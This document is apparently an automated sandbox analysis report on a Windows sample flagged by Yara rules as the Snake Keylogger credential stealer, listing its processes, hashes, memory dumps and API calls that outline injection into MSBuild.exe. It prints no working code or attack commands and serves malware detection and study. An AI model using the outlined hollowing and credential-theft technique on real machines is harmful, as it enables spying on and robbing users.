2024-07-27 09:39:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:38:58
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\R86BRY7DdC.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\R86BRY7DdC.exe"
Imagebase:	0x5d0000
File size:	294'400 bytes
MD5 hash:	D747188C998CBD80A03250D578236E29
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1697512676.00000000128E9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:39:01
Start date:	27/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xb0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:39:01
Start date:	27/07/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Imagebase:	0xe20000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4118139508.000000000356B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.4116615016.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4118139508.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	25%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	11.1%
Total number of Nodes:	27
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9B87166C Relevance: 1.7, APIs: 1, Instructions: 197
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetReadFile.WININET ref: 00007FFD9B8717B7

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 9ea74fb6f52212386eb17dda3a4136c1103d8007d8819b0d9a6159bcf2a5bfce
Instruction ID: a194e78549a15cfdc326161923c9e53a6e6d1e85d033beae6e134bb8ca331740
Opcode Fuzzy Hash: 9ea74fb6f52212386eb17dda3a4136c1103d8007d8819b0d9a6159bcf2a5bfce
Instruction Fuzzy Hash: 0E513870918A1C8FDF58DF98C899BE9BBF0FB69311F1041AED049A3651DB70A985CF81

Function 00007FFD9B87140D Relevance: 1.7, APIs: 1, Instructions: 247
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenUrlW.WININET ref: 00007FFD9B8715B2

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 0dc71653fd0d384a71fb1346378eb0957d6e5e5877f2c89ae25a17b7dd08834e
Instruction ID: f6fd00f321c2158a68a96f63522321556a445e55983dff5985953d11e2d3d429
Opcode Fuzzy Hash: 0dc71653fd0d384a71fb1346378eb0957d6e5e5877f2c89ae25a17b7dd08834e
Instruction Fuzzy Hash: 57711570908A5D8FDB98EF58C894BE9BBF1FB69311F1001AED04EE3651DB75A980CB41

Function 00007FFD9B8711DC Relevance: 1.7, APIs: 1, Instructions: 244
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET ref: 00007FFD9B871377

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: cdabef00a5971598f6636feedcfe5d76b58c0bdadf5a23e7a40fa746ea050d29
Instruction ID: 81d4ff4ebc4ee86a0445c364dec72c92d8e195e757def73fe9197e8388004a3c
Opcode Fuzzy Hash: cdabef00a5971598f6636feedcfe5d76b58c0bdadf5a23e7a40fa746ea050d29
Instruction Fuzzy Hash: 1C71F570A08A1D8FDBA8EF58C854BE9B7F1FB69315F1041AED00EE3651DB75A981CB40

Function 00007FFD9B876151 Relevance: 1.7, APIs: 1, Instructions: 219
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32 ref: 00007FFD9B8762D0

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7d8d06e0f0cd281c21b4521b3b73d518c2ebdb09e01b901101afbf37f98978c1
Instruction ID: f5fd7b88e72c56ee8e799b3eb344046d2635fe7181709fd5b5da6d811756f53c
Opcode Fuzzy Hash: 7d8d06e0f0cd281c21b4521b3b73d518c2ebdb09e01b901101afbf37f98978c1
Instruction Fuzzy Hash: 12613970908A1D8FDB98DF58C885BE9BBF1FB69310F1082AAD44DE3255CB34A985CF40

Function 00007FFD9B87635D Relevance: 1.7, APIs: 1, Instructions: 192
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNEL32 ref: 00007FFD9B87649B

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 32f0e2cdc8ca37e8d3cb1d1ef2aa5df16de432f908ab4f5070042b22377f0134
Instruction ID: 36bc9376963a2f355a0e5e5a10fd428beddd6c62193706fd88a54f668e24f411
Opcode Fuzzy Hash: 32f0e2cdc8ca37e8d3cb1d1ef2aa5df16de432f908ab4f5070042b22377f0134
Instruction Fuzzy Hash: E651F770908A5C8FDB98DF58C885BE9BBF1FB69310F1082AAD44DE7251DB74A985CB40

Function 00007FFD9B87599B Relevance: 1.7, APIs: 1, Instructions: 191
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32 ref: 00007FFD9B875A93

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b713792bcb58457f61626d12102766bea393c9e9ce8e43b55fbc29d35b695668
Instruction ID: 4e89f5a2184ecf6f8e5263ce6e4b1708d7a64fdea0a98cad854f6597cd40f3b0
Opcode Fuzzy Hash: b713792bcb58457f61626d12102766bea393c9e9ce8e43b55fbc29d35b695668
Instruction Fuzzy Hash: 0351097060868D8FDBB8EF18D895BE977E1FB59310F50412AD80DC7292DB35A645CB41

Function 00007FFD9B875FAC Relevance: 1.7, APIs: 1, Instructions: 184
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNEL32 ref: 00007FFD9B8760C5

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5ce3a93289f0bdd7ddbbc9ddd8a26459129ce9bf7ae9bf6d5938dd4d171bd6a9
Instruction ID: 5a3d4b87e8f60898b941e7c0c48d4410a6c8f17a2d8bfa359bae91278a6e956f
Opcode Fuzzy Hash: 5ce3a93289f0bdd7ddbbc9ddd8a26459129ce9bf7ae9bf6d5938dd4d171bd6a9
Instruction Fuzzy Hash: D4510A70908A1C8FDF98EF58C845BE9BBF1FB69310F1091AAD44DE3255DB71A9858F80

Function 00007FFD9B875CCC Relevance: 1.7, APIs: 1, Instructions: 164
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32 ref: 00007FFD9B875DD5

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e689cddfd230e6a555b578deacb535c3cd02813a3b51734461308fb4944a5e5f
Instruction ID: 673c94732858d34ab95b47ca1b05c250a814aa87c61f6d0b7c7d4f48c3b7b171
Opcode Fuzzy Hash: e689cddfd230e6a555b578deacb535c3cd02813a3b51734461308fb4944a5e5f
Instruction Fuzzy Hash: C051F570908A1C8FEB98DF99C889BEDBBF1FB58311F10826AD409E7255DB749985CF40

Function 00007FFD9B875E49 Relevance: 1.6, APIs: 1, Instructions: 139
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FFD9B875F1F

Memory Dump Source

Source File: 00000000.00000002.1700259738.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b870000_R86BRY7DdC.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0dd2fb44e4adc156a313e18f75e8ba7e8f391e90ae0e50b1567bea448e85acec
Instruction ID: f63efdb307c7410577abcfe07adc87d204f6a21e8ada0e9caf9b00648dc751e7
Opcode Fuzzy Hash: 0dd2fb44e4adc156a313e18f75e8ba7e8f391e90ae0e50b1567bea448e85acec
Instruction Fuzzy Hash: F5416830E0864D8FDB59DFA8D895AEDBBF0FF5A310F1041AAD049E7292DA34A485CB40

Analysis Process: MSBuild.exePID: 6400, Parent PID: 7148COMMON

Executed Functions

Function 032C6730 Relevance: 6.7, Strings: 5, Instructions: 439COMMON

Download Yara Rule

Strings

(o^q, xrefs: 032C6988
(o^q, xrefs: 032C6CA5
,bq, xrefs: 032C69F2
,bq, xrefs: 032C6A00
(o^q, xrefs: 032C697A

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: b94ba66032d883fed23c7cfc1ef8513b837f20c3f85afd495f14548c542888e7
Instruction ID: d7a799d1000de840320b30b497abd449d8e43583dc9fc959dd9f1b12293634f6
Opcode Fuzzy Hash: b94ba66032d883fed23c7cfc1ef8513b837f20c3f85afd495f14548c542888e7
Instruction Fuzzy Hash: 62025071A2014ADFCB14CF69D988AADFBB6FF88300F1C8669E415AB261D731DD85CB50

Function 032CB328 Relevance: 6.6, Strings: 5, Instructions: 349COMMON

Download Yara Rule

Strings

PH^q, xrefs: 032CB758
LjAp, xrefs: 032CB6E5
0oAp, xrefs: 032CB562
LjAp, xrefs: 032CB6CF
PH^q, xrefs: 032CB747

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: b13c1bcd46914a763723234dd640ed2092afdf7e7f4329c4948ce83bbacc8a74
Instruction ID: 1d5a2ee43487ac3fde714271f31cc8aeaa87f7372dc812c49823b1469493151e
Opcode Fuzzy Hash: b13c1bcd46914a763723234dd640ed2092afdf7e7f4329c4948ce83bbacc8a74
Instruction Fuzzy Hash: 8EE12D75E14259CFDB14CFA9C994A9DBBB1FF48300F1981A9E809AB361DB31E881CF50

Function 032CBBD2 Relevance: 6.4, Strings: 5, Instructions: 188COMMON

Download Yara Rule

Strings

LjAp, xrefs: 032CBDAF
LjAp, xrefs: 032CBDC5
0oAp, xrefs: 032CBC42
PH^q, xrefs: 032CBE38
PH^q, xrefs: 032CBE27

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: c07b598781fd4299b22c4f03b102fa2dc924ef6668513a03dd29cce095eacc82
Instruction ID: 4827aae1fd3d725cfeceba086aeccc759e815115f94cfc75b4f0f799c61bf70d
Opcode Fuzzy Hash: c07b598781fd4299b22c4f03b102fa2dc924ef6668513a03dd29cce095eacc82
Instruction Fuzzy Hash: 6D81C374E10248DFDB18DFAAD994A9DBBF2BF89300F14C169E408AB365DB349981CF50

Function 032CBEB0 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

LjAp, xrefs: 032CC08F
LjAp, xrefs: 032CC0A5
PH^q, xrefs: 032CC118
0oAp, xrefs: 032CBF22
PH^q, xrefs: 032CC107

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: c4556f32a3ddde8dc69f62f6e7c27c3c77b1178391e3c54402a6097db594c1ef
Instruction ID: 8bc78799eb58f8c530cbbb3f7f87fe0cb645e50319b9ee59092622fab08a56c5
Opcode Fuzzy Hash: c4556f32a3ddde8dc69f62f6e7c27c3c77b1178391e3c54402a6097db594c1ef
Instruction Fuzzy Hash: E981D274E10258CFDB14DFAAD984A9DBBF2BF88300F14D169E409AB365DB359982CF50

Function 032CC190 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjAp, xrefs: 032CC385
LjAp, xrefs: 032CC36F
PH^q, xrefs: 032CC3F8
PH^q, xrefs: 032CC3E7
0oAp, xrefs: 032CC202

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 969d971c125ddeb73106fa65cc8101e468c48ba3ee9fef0044d1e23a9ef6d906
Instruction ID: e6b9eccc0cf21caf1fc25491b501c90da9e7dd9a3d40c716c5164602b1c17703
Opcode Fuzzy Hash: 969d971c125ddeb73106fa65cc8101e468c48ba3ee9fef0044d1e23a9ef6d906
Instruction Fuzzy Hash: 2081D374E10258CFDB14DFAAD984A9DBBF2BF88300F14C169E419AB365DB349982CF50

Function 032CC790 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjAp, xrefs: 032CC985
LjAp, xrefs: 032CC96F
PH^q, xrefs: 032CC9E7
PH^q, xrefs: 032CC9F8
0oAp, xrefs: 032CC802

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 4179e8fc9e62090a082088d59b7d9cd7fd63b816fa74fa3cd680435be0581ea2
Instruction ID: 166f0172ab6df933085b7d8e7871aa315bad3e73b568bbc5227a095d6bc0fccc
Opcode Fuzzy Hash: 4179e8fc9e62090a082088d59b7d9cd7fd63b816fa74fa3cd680435be0581ea2
Instruction Fuzzy Hash: 8081B174E102589FDB14DFAAD984A9DFBF2BF88300F14D169E409AB365DB349982CF50

Function 032CCA70 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

0oAp, xrefs: 032CCAE2
PH^q, xrefs: 032CCCD8
PH^q, xrefs: 032CCCC7
LjAp, xrefs: 032CCC4F
LjAp, xrefs: 032CCC65

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: a7af2437acfe4880ffe663a1d857777f8e5299570daa49ddb4ee5038284c3803
Instruction ID: 93ca2b53a68e9cb6adde1a0a13aec8946955ca2ac11cfcf4f890fa8e4e13b523
Opcode Fuzzy Hash: a7af2437acfe4880ffe663a1d857777f8e5299570daa49ddb4ee5038284c3803
Instruction Fuzzy Hash: 7681B474E10258DFDB14DFAAD984A9DBBF2BF89300F14C169D819AB365DB349982CF10

Function 032CCD52 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

LjAp, xrefs: 032CCF45
LjAp, xrefs: 032CCF2F
PH^q, xrefs: 032CCFA7
PH^q, xrefs: 032CCFB8
0oAp, xrefs: 032CCDC2

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 595fd8a8f65ff4fe84f952bbd47c5da4e0017ace2c84e7539167f6fc137f45ee
Instruction ID: 5c7e02506e7ccc7282e996bd89e4b9e8d60fa61067fe238f8c50bdd0b6e6cc00
Opcode Fuzzy Hash: 595fd8a8f65ff4fe84f952bbd47c5da4e0017ace2c84e7539167f6fc137f45ee
Instruction Fuzzy Hash: 4B81C474E10258DFDB14DFAAD984A9DBBF2BF89300F14C16AE409AB365DB349981CF50

Function 032C4AD9 Relevance: 6.4, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

LjAp, xrefs: 032C4CCE
LjAp, xrefs: 032C4CB8
0oAp, xrefs: 032C4B4A
PH^q, xrefs: 032C4D41
PH^q, xrefs: 032C4D30

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 5e406720a79910493c278fb41c3414f2b493b587491fcae46fc072e61814adb5
Instruction ID: 1ae366878f5dfcf522b8dbf52189e3c8ad7da206c98ddee060cb1ac52a008dbf
Opcode Fuzzy Hash: 5e406720a79910493c278fb41c3414f2b493b587491fcae46fc072e61814adb5
Instruction Fuzzy Hash: 7F81D574E10258CFDB14DFAAD994A9EBBF2BF88300F14D169D818AB365DB349981CF10

Function 032CB4F2 Relevance: 3.9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

PH^q, xrefs: 032CB758
0oAp, xrefs: 032CB562
PH^q, xrefs: 032CB747

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0oAp$PH^q$PH^q
API String ID: 0-4194141968
Opcode ID: 6aa17749a5a1166366584562051a4a698ae67592bbdd1fdeffb9c9857c40bf87
Instruction ID: 12ddc7115dc9be2af72e26e837d961fa1a0dbe65840d07ccad510f2789e41e61
Opcode Fuzzy Hash: 6aa17749a5a1166366584562051a4a698ae67592bbdd1fdeffb9c9857c40bf87
Instruction Fuzzy Hash: 5161D574E102489FDB18DFAAD984A9DFBF2BF88300F14C169D818AB365DB345981CF50

Function 032C9858 Relevance: 3.4, Strings: 2, Instructions: 850COMMON

Download Yara Rule

Strings

(o^q, xrefs: 032C9C78
4'^q, xrefs: 032CA273

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 968f235184b860f7da9167e0fef83d3e045ea57eae459c5f76fa3565a52146c1
Instruction ID: dab11ddc263536c1d57ff21fa0b291ec6822fe49502c7e07db1980224940f1e1
Opcode Fuzzy Hash: 968f235184b860f7da9167e0fef83d3e045ea57eae459c5f76fa3565a52146c1
Instruction Fuzzy Hash: 03728171A2064ADFCB15CF68C984AAEBBF6FF48300F158659E8059B3A5D770E9C1CB50

Function 032C6108 Relevance: 3.0, Strings: 2, Instructions: 509COMMON

Download Yara Rule

Strings

(o^q, xrefs: 032C6642
Hbq, xrefs: 032C650E

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 89a449526e9cad2cf4693975b243bd9294ad33b2f2badbeadfceb1f4f3352a4a
Instruction ID: 8ec34ebf97218487ba457f922a939566e20c6fd5314d4f98ffbd2d506552e5eb
Opcode Fuzzy Hash: 89a449526e9cad2cf4693975b243bd9294ad33b2f2badbeadfceb1f4f3352a4a
Instruction Fuzzy Hash: 7D128174A102599FCB24DF69C894AAEBBF6FF88300F18865DE405DB395DF349885CB50

Function 032CEE68 Relevance: .7, Instructions: 717COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22409a0278a909ca2c132fa61f001f708dc7ee09147df61313ed0ae91274556d
Instruction ID: c89b2a117cd88883f1a33765fb7fd778cf959fcfa56ce020e4ae72ee1386c601
Opcode Fuzzy Hash: 22409a0278a909ca2c132fa61f001f708dc7ee09147df61313ed0ae91274556d
Instruction Fuzzy Hash: E172BD74E112699FDB64DF69C984BD9BBB2BB49300F1492EAD408A7251DB349EC1CF40

Function 032C6E58 Relevance: 10.5, Strings: 8, Instructions: 475COMMON

Download Yara Rule

Strings

(o^q, xrefs: 032C6F51
(o^q, xrefs: 032C6F7D
,bq, xrefs: 032C72F8
(o^q, xrefs: 032C7367
,bq, xrefs: 032C7308
(o^q, xrefs: 032C701A
(o^q, xrefs: 032C7377
(o^q, xrefs: 032C6E96

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: de168635a40e6afcddd775f9532e9ff411e0281332f6290dc903bbe1a121d843
Instruction ID: 1182c3e6a7599abfc00bb357f4a9c3a3c945f46293939a1af8c5573bdab87f19
Opcode Fuzzy Hash: de168635a40e6afcddd775f9532e9ff411e0281332f6290dc903bbe1a121d843
Instruction Fuzzy Hash: B2124930A206498FCB14CF69D984A9EBBF6FF48314F198699E8159B361DB31ED81CF50

Function 032C215C Relevance: 5.3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

Strings

Xbq, xrefs: 032C220E
Xbq, xrefs: 032C2248
Xbq, xrefs: 032C22C7
Xbq, xrefs: 032C2314

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 7eae50b27564072af4185b8b3d8b21df74d9575584be5779798425248562d086
Instruction ID: 4a96a571f18c8778e27af2f945494fb06714e06ca081fbc359dd947278f27281
Opcode Fuzzy Hash: 7eae50b27564072af4185b8b3d8b21df74d9575584be5779798425248562d086
Instruction Fuzzy Hash: AF91C573DA06698FCF12DEF48C682EDF7B5FB59200F198E59C4057B644DA30AB828791

Function 032C87E9 Relevance: 4.2, Strings: 3, Instructions: 493COMMON

Download Yara Rule

Strings

;^q, xrefs: 032C8C2C
4'^q, xrefs: 032C8837
4'^q, xrefs: 032C8811

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$;^q
API String ID: 0-799016360
Opcode ID: 354bccf6877d16a22177861a1b11a34a2e356748d21d70592cddc667251242fe
Instruction ID: 930049e06299b1ff523c034f360c36b5c7697f8b60c5c9569d71d533d4625e11
Opcode Fuzzy Hash: 354bccf6877d16a22177861a1b11a34a2e356748d21d70592cddc667251242fe
Instruction Fuzzy Hash: ECF1A5713701828FDB18DA39C968B39769AAF85700F1986AEE516CF3A1EB75CCC1C741

Function 032C77F0 Relevance: 3.2, Strings: 2, Instructions: 692COMMON

Download Yara Rule

Strings

$^q, xrefs: 032C8337
$^q, xrefs: 032C8314

Memory Dump Source

Source File: 00000002.00000002.4117767256.00000000032C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32c0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 7ab8e4f26253e2a8913eaa9a6d844a6bb5cefe401edbb34449f6960f2ebe1917
Instruction ID: 87573ed487e9871b42ebe157742cbf2de204eae78bac7222eb967eff871a8969
Opcode Fuzzy Hash: 7ab8e4f26253e2a8913eaa9a6d844a6bb5cefe401edbb34449f6960f2ebe1917
Instruction Fuzzy Hash: C0524278A1025CCFEB14DBA4C8A4BAEBB76EF84300F1091A9C10A6B365DF359D85DF51

